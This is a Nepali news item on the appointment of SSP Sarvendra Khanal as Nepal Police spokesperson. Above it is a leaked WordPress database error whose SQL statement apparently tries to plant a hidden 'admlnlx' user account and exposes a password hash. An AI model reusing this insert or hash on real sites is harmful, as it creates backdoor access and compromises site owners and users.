WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BT8Heg8TTJHNiP4E.6E0VzEsw1M8r20', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 18:05:25', '', 'admlnlx', 'admlnlx')
काठमाडौं ,फागुन ३ –
नेपाल प्रहरीले आफ्नो नयाँ प्रवक्ताको रुपमा प्रहरी वरिष्ठ उपरीक्षक (एसएसपी) सर्वेन्द्र खनाललाई तोकेको छ। प्रहरी प्रधान कार्यालयले सोमबारदेखि एसएसपी खनाललाई प्रवक्ताको रुपमा तोकेको हो। उनी दुई हप्ताअघि माघ १३ गतेबाट महानगरीय अपराध महाशाखाबाट प्रहरी महानिरीक्षकको सचिवालय सरुवा भएका थिए। यसअघिका प्रवक्ता प्रहरी नायव महानिरीक्षक हेमन्त मल्ल ठकुरीले ३० वर्षे अनिवार्य अवकाश पाएपछि एसएसपी ठाकुरप्रसाद ज्ञवालीले सह प्रवक्ताको रुपमा जिम्मेवारी सम्हाल्दै आएका थिए। ज्ञवालीको पनि मध्य पश्चिम क्षेत्रिय प्रहरी तालिम केन्द्र, नेपालगन्जमा सरुवा भएपछि सो जिम्मेवारी एसएसपी खनाललाई दिइएको प्रधान कार्यालयले जनाएको छ। एसएसपी खनालले यसअघि पनि नेपाल प्रहरीको प्रवक्ताको रुपमा जिम्मेवारी सम्हालिसकेका छन्।